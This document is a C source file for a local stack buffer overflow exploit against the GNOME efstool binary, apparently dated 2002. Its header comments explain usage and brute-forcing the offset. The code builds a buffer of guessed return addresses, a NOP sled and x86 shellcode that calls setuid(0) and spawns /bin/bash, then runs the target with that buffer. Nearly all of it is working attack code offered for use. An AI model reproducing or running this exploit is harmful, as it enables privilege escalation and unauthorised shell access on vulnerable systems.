/* efstool.c - efstool/bof simple overflow in efstool,
 *
 *
 * This code is published propterty of CloudAss, you may
 * duplicate this in any shape or form without prior written
 * permission from CloudAss.
 *
 * Bug discovered by ntfx, just figured I'd code a decent
 * exploit for it.
 *
 *
 * DISCLAIMER - I am in no way affiliated with ntfx or any members of
 * soldierx or legion2002 security.
 *
 * Usage: ./efsroot offset - bruteforce if neccesary
 *
 * Bug is pretty stupid, and simple, I have yet to see it give root.
 * efstool is not +s on slackware 8.0 , it should spawn a shell
 * regardless.
 *
 * (C) COPYRIGHT CloudAss , 2002
 * all rights reserved
 ***********************************************************************
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define SIZE 3000
#define NOP 0x90
#define PATH "/opt/gnome/bin/efstool"

//--------------------------------------------------
long get_esp(void){ __asm__("movl %esp,%eax\n");}
//--------------------------------------------------

char shellcode[]=
   "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
   "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
   "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
   "\x80\xe8\xdc\xff\xff\xff/bin/bash";

int main(int argc, char *argv[]) {
char buffer[SIZE];
long retaddr, offset;
int i;

offset = atoi(argv[1]);
retaddr = get_esp() + offset;

for(i=0; i < SIZE; i+=4)
 *(long *)&buffer[i] = retaddr;

for(i=0; i < strlen(shellcode); i++)
*(buffer+i) = NOP;

memcpy(buffer+i, shellcode, strlen(shellcode));
execl(PATH, "efstool", buffer, 12);
return 0;
}